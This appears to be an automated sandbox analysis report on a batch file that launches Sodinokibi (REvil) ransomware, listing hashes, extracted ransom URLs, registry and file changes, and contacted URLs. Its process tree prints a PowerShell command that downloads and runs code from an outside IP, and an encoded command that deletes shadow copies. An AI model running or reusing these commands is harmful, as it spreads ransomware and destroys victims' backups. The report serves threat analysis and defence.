Analysis
-
max time kernel
138s -
max time network
138s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
01-05-2020 04:10
Static task
static1
Behavioral task
behavioral1
Sample
4tM71hqZ.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
4tM71hqZ.bat
Resource
win10v200430
General
-
Target
4tM71hqZ.bat
-
Size
198B
-
MD5
b883baec628ab0b3bae209a8d1d0a339
-
SHA1
79bbacc2b6ed81d4146b58f8a100fb83acba1e0c
-
SHA256
4c2d46061923d9aec3c2a9788f4c17d1815adf849edfe6acc0a0343a5484b752
-
SHA512
17cdc7879abe666c1893a5cf17d63ae9d22804a76c2d11a623a68118ac2ef0043c40ae6c2a8c558161bd180ab1d4bcd38342a88ae319fd57ecb7daf7b50d2735
Malware Config
Extracted
http://185.103.242.78/pastes/4tM71hqZ
Extracted
C:\39p89ngw-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D8BD55EFC979DC01
http://decryptor.cc/D8BD55EFC979DC01
Signatures
-
Processes:
powershell.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 430000000100000000000000040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f007400200043004100200058003300000020000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e650190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000002000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 316 wrote to memory of 1096 316 cmd.exe powershell.exe PID 1096 wrote to memory of 904 1096 powershell.exe powershell.exe PID 1096 wrote to memory of 904 1096 powershell.exe powershell.exe PID 1096 wrote to memory of 904 1096 powershell.exe powershell.exe PID 1096 wrote to memory of 904 1096 powershell.exe powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dtm704z1q753.bmp" powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe -
Drops file in Program Files directory 27 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\GetGroup.mpeg3 powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\39p89ngw-readme.txt powershell.exe File opened for modification \??\c:\program files\ResolveInstall.potm powershell.exe File opened for modification \??\c:\program files\RestartWrite.css powershell.exe File opened for modification \??\c:\program files\RevokeSet.aifc powershell.exe File created \??\c:\program files\microsoft sql server compact edition\39p89ngw-readme.txt powershell.exe File created \??\c:\program files\39p89ngw-readme.txt powershell.exe File opened for modification \??\c:\program files\CheckpointResize.zip powershell.exe File opened for modification \??\c:\program files\EnableOut.jfif powershell.exe File opened for modification \??\c:\program files\WatchExpand.m4v powershell.exe File opened for modification \??\c:\program files\ConvertFromUnregister.easmx powershell.exe File opened for modification \??\c:\program files\CopyFormat.vsdm powershell.exe File opened for modification \??\c:\program files\AddRevoke.mpeg3 powershell.exe File opened for modification \??\c:\program files\HideEnter.vsd powershell.exe File opened for modification \??\c:\program files\ResolveShow.mp2 powershell.exe File opened for modification \??\c:\program files\ShowConfirm.mht powershell.exe File opened for modification \??\c:\program files\UnpublishCompress.mpeg powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\39p89ngw-readme.txt powershell.exe File opened for modification \??\c:\program files\ImportLock.midi powershell.exe File opened for modification \??\c:\program files\PushUnlock.sql powershell.exe File opened for modification \??\c:\program files\RegisterEdit.MTS powershell.exe File opened for modification \??\c:\program files\MountTrace.mp2 powershell.exe File opened for modification \??\c:\program files\RegisterUpdate.avi powershell.exe File opened for modification \??\c:\program files\EnableBlock.asx powershell.exe File opened for modification \??\c:\program files\InstallExpand.xhtml powershell.exe File opened for modification \??\c:\program files\MountPublish.xml powershell.exe File created \??\c:\program files (x86)\39p89ngw-readme.txt powershell.exe -
Makes http(s) request 57 IoCs
Contacts server via http/https, possibly for C2 communication.
Processes:
description flow ioc HTTP URL 149 https://grelot-home.com/news/game/xn.jpg HTTP URL 284 https://ditog.fr/include/tmp/slhxqmnetfrj.png HTTP URL 16 https://www.fensterbau-ziegler.de/content/pics/ipgscazkdm.gif HTTP URL 101 https://architecturalfiberglass.org/news/tmp/rsgaku.jpg HTTP URL 254 https://osterberg.fi/admin/assets/gesnutjl.gif HTTP URL 118 https://www.monark.com/wp-content/game/dxjils.gif HTTP URL 1 http://185.103.242.78/pastes/4tM71hqZ HTTP URL 76 https://tinkoff-mobayl.ru/data/graphic/jovbmuox.png HTTP URL 176 https://koken-voor-baby.nl/data/temp/kiwirlbioq.png HTTP URL 229 https://365questions.org/admin/image/dvzzpkgygu.jpg HTTP URL 337 https://bptdmaluku.com/data/tmp/nblcmaoncj.gif HTTP URL 150 https://grelot-home.com/ HTTP URL 5 http://apps.identrust.com/roots/dstrootcax3.p7c HTTP URL 252 https://www.waynela.com/include/pics/aocsal.gif HTTP URL 303 https://tarotdeseidel.com/admin/tmp/at.gif HTTP URL 31 https://jvanvlietdichter.nl/static/graphic/oo.gif HTTP URL 14 https://fensterbau-ziegler.de/content/pics/ipgscazkdm.gif HTTP URL 282 https://stingraybeach.com/wp-content/pictures/whfqmxmiwlofpfae.gif HTTP URL 90 https://buymedical.biz/data/game/gbekgzdrmv.jpg HTTP URL 108 https://dontpassthepepper.com/uploads/image/dsgkarxl.gif HTTP URL 114 https://bargningavesta.se/data/assets/kxohvvdj.jpg HTTP URL 83 https://imaginado.de/admin/pics/lbwvnxngfg.gif HTTP URL 144 https://ecoledansemulhouse.fr/news/game/gxowdm.jpg HTTP URL 212 http://secure.globalsign.com/cacert/gsrsadvsslca2018.crt HTTP URL 59 https://www.danskretursystem.dk/admin/game/zx.jpg/ HTTP URL 110 https://dushka.ua/admin/tmp/trbvqdpvxu.jpg HTTP URL 190 https://pawsuppetlovers.com/news/pictures/mdea.png HTTP URL 220 https://shhealthlaw.com/content/game/xxpqoq.jpg HTTP URL 277 https://securityfmm.com/static/image/gmhrta.png HTTP URL 152 https://www.grelot-home.com/ HTTP URL 103 https://www.architecturalfiberglass.org/news/tmp/rsgaku.jpg HTTP URL 116 https://monark.com/wp-content/game/dxjils.gif HTTP URL 134 https://haremnick.com/static/image/rxbkfmxb.gif HTTP URL 250 https://waynela.com/include/pics/aocsal.gif HTTP URL 331 https://mooglee.com/static/images/jpfuuanykjec.png HTTP URL 88 https://lange.host/news/images/ek.gif HTTP URL 18 https://southeasternacademyofprosthodontics.org/news/images/kbeiqm.png HTTP URL 202 https://triactis.com/include/graphic/arunypoued.gif HTTP URL 333 https://spectrmash.ru/news/game/nrbpezioaj.jpg HTTP URL 3 https://deschl.net/data/temp/rmbd.png HTTP URL 20 https://qualitus.com/data/image/hczahccs.png HTTP URL 56 https://danskretursystem.dk/admin/game/zx.jpg HTTP URL 7 http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP URL 157 https://completeweddingkansas.com/wp-content/graphic/bwdtzdfb.png HTTP URL 169 https://dubnew.com/news/temp/fdptfgbs.jpg HTTP URL 256 https://c-a.co.in/news/assets/kl.jpg HTTP URL 258 https://hugoversichert.de/data/assets/xuifch.png HTTP URL 9 https://trystana.com/uploads/images/ldbesq.png HTTP URL 326 https://dr-pipi.de/data/graphic/gbku.gif HTTP URL 311 https://1kbk.com.ua/include/temp/py.png HTTP URL 159 https://completewedo.com/kansas/wp-content/graphic/bwdtzdfb.png HTTP URL 95 https://zimmerei-deboer.de/news/images/vnud.jpg HTTP URL 142 https://1team.es/data/pics/owxymyxwdtxy.jpg HTTP URL 204 https://www.triactis.com/page-403.php HTTP URL 214 https://ora-it.de/include/game/fxtzlf.png HTTP URL 324 https://vitalyscenter.es/uploads/tmp/xvwh.png HTTP URL 58 https://www.danskretursystem.dk/admin/game/zx.jpg -
Enumerates connected drives 3 TTPs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1096 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1096 powershell.exe Token: SeDebugPrivilege 1096 powershell.exe Token: SeDebugPrivilege 904 powershell.exe Token: SeBackupPrivilege 1796 vssvc.exe Token: SeRestorePrivilege 1796 vssvc.exe Token: SeAuditPrivilege 1796 vssvc.exe Token: SeTakeOwnershipPrivilege 1096 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1096 powershell.exe 1096 powershell.exe 1096 powershell.exe 904 powershell.exe 904 powershell.exe -
Blacklisted process makes network request 191 IoCs
Processes:
powershell.exeflow pid process 1 1096 powershell.exe 3 1096 powershell.exe 5 1096 powershell.exe 7 1096 powershell.exe 9 1096 powershell.exe 11 1096 powershell.exe 12 1096 powershell.exe 14 1096 powershell.exe 16 1096 powershell.exe 18 1096 powershell.exe 20 1096 powershell.exe 22 1096 powershell.exe 23 1096 powershell.exe 25 1096 powershell.exe 26 1096 powershell.exe 28 1096 powershell.exe 29 1096 powershell.exe 31 1096 powershell.exe 33 1096 powershell.exe 34 1096 powershell.exe 36 1096 powershell.exe 37 1096 powershell.exe 39 1096 powershell.exe 41 1096 powershell.exe 42 1096 powershell.exe 44 1096 powershell.exe 45 1096 powershell.exe 47 1096 powershell.exe 48 1096 powershell.exe 50 1096 powershell.exe 51 1096 powershell.exe 53 1096 powershell.exe 54 1096 powershell.exe 56 1096 powershell.exe 58 1096 powershell.exe 59 1096 powershell.exe 61 1096 powershell.exe 63 1096 powershell.exe 65 1096 powershell.exe 66 1096 powershell.exe 68 1096 powershell.exe 71 1096 powershell.exe 76 1096 powershell.exe 78 1096 powershell.exe 79 1096 powershell.exe 81 1096 powershell.exe 83 1096 powershell.exe 85 1096 powershell.exe 86 1096 powershell.exe 88 1096 powershell.exe 90 1096 powershell.exe 93 1096 powershell.exe 95 1096 powershell.exe 97 1096 powershell.exe 99 1096 powershell.exe 101 1096 powershell.exe 103 1096 powershell.exe 105 1096 powershell.exe 108 1096 powershell.exe 110 1096 powershell.exe 112 1096 powershell.exe 114 1096 powershell.exe 116 1096 powershell.exe 118 1096 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\4tM71hqZ.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/4tM71hqZ');Invoke-MPVDCPFRXOEJGHA;Start-Sleep -s 10000"2⤵
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
- Sets desktop wallpaper using registry
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
PID:1096 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:904
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1796